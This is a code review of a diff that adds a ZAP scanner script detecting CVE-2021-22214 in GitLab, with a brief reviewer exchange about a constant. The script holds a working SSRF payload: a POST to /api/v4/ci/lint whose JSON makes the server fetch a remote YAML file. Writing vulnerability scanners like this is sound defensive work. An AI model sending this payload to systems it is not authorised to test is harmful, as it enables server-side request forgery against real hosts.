targeted/cve-2021-22214.js

```diff
@@ -0,0 +1,150 @@
+            alertReference,
+            cweId,
+            wascId,
+            msg,
+            url
+        );
+    };
+    logger("Script run completed.");
+}
+
+/**
+ * Send a custom HTTP Request by manipulating the HttpMessage Object.
+ * 
+ * @param {Object.<HttpMessage>} msg - The HttpMessage Object being scanned
+ * @return {Object.<HttpMessage>}	 - The HTTP Response
+ */
+function sendReq(msg) {
+    // Modify the Request Header
+    var newReq = generateRequest(msg);
+    // Initiate the HttpSender
+    var sender = new org.parosproxy.paros.network.HttpSender(org.parosproxy.paros.model.Model.getSingleton().getOptionsParam().getConnectionParam(), true, 6);
+    // Fire the Request
+	sender.sendAndReceive(newReq);
+    // Debugging
+    // logger("Request Header -> " + newReq.getRequestHeader().toString())
+    // logger("Request Body -> " + newReq.getRequestBody().toString())
+    // logger("Response Header -> " + newReq.getResponseHeader().toString())
+    // logger("Raw Response Body -> " + newReq.getResponseBody().toString())
+	return newReq;
+}
+
+/**
+ * 
+ * @param {Object.<HttpMessage>} msg - The HttpMessage Object being scanned
+ * @returns {Object.<HttpMessage>}   - The HttpMessage with modified Request Header
+ */
+function generateRequest(msg) {
+    // The JSON Body Payload
+    var obj = {"include_merged_yaml": true, "content": "include:\n  remote: https://raw.githubusercontent.com/getastra/juice-shop/master/resources/cve-2021-22214.yml"}
+    // The Content-Type Header's value
+    var contentLength = JSON.stringify(obj).length
+    // Clone the original request
+    var newReq = msg.cloneRequest();
+    // Change the HTTP method to POST
+    newReq.getRequestHeader().setMethod('POST');
+    // The URL should be {{BaseURL}}/api/v4/ci/lint
+    newReq.getRequestHeader().getURI().setPath('/api/v4/ci/lint');
+    // Set the request body
+    newReq.setRequestBody(JSON.stringify(obj));
+    // Set the relevant content headers
+    newReq.getRequestHeader().setHeader(org.parosproxy.paros.network.HttpHeader.CONTENT_TYPE,"application/json");
+    // Content Length in String since that is the required Data type
+	newReq.getRequestHeader().setHeader(org.parosproxy.paros.network.HttpHeader.CONTENT_LENGTH, String(contentLength));
+
+    // Return the modified HttpMessage Object
+    return newReq;
+}
+
+/**
+ * Raise an alert.
+ * @see https://www.javadoc.io/doc/org.zaproxy/zap/latest/org/parosproxy/paros/core/scanner/Alert.html
+ */
+function customAlert(pluginid, alertRisk, alertConfidence, alertName, alertDesc, alertAttack, alertEvidence, otherInfo, alertSol, alertReference, cweId, wascId, msg, url) {
+    var extensionAlert = org.parosproxy.paros.control.Control.getSingleton().getExtensionLoader().getExtension(org.zaproxy.zap.extension.alert.ExtensionAlert.NAME);
+    var ref = null;
+    ref = new org.parosproxy.paros.model.HistoryReference(org.parosproxy.paros.model.Model.getSingleton().getSession(), 15, msg);
```

Comment:
Use the constant for the type.

Reply:
I didn't understand what you meant by this. Some more details, please?

Reply:
`HistoryReference.TYPE_ZAP_USER`. btw, the `ref` variable could be initialised directly.

Reply:
Resolved.